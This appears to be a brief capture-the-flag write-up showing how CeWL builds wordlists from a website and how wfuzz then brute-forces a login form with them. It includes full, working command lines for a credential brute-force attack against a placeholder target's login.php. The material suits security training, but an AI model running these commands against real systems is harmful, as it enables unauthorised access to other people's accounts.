04 Dec 2023
Brute-forcing Baby, it’s CeWLd outsideCeWL is a custom wordlist generator that spiders websites to create word lists based on the site’s content. Capability helps in brute-forcing and uncovering hidden directories using organization-specific terminology. Can also compile lists of email addresses or usernames from team member pages.
Create basic list:
cewl http://ADDRESS
Create and save list to file:
cewl http://ADDRESS -w FILENAME.txt
Since it’s CLI, it can be easily integrated into automated workflows and outputs can be directly inserted into other tools.
In this case, use wfuzz to make use of outputs.
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://ADDRESS/login.php -d "username=FUZZ&password=FUZ2Z"
-c output with colors-z file,usernames.txt loads the usernames list-z file,passwords.txt uses the password list generated by CeWL--hs "Please enter the correct credentials" hides responses containing the defined string-u target URL-d "username=FUZZ&password=FUZ2Z" provides POST data format to use and variables to replaceGenerate username and password word lists from the website, then use wfuzz to find the credentials that work and grab the flag from the email.
Flag gotten.
Web Enumeration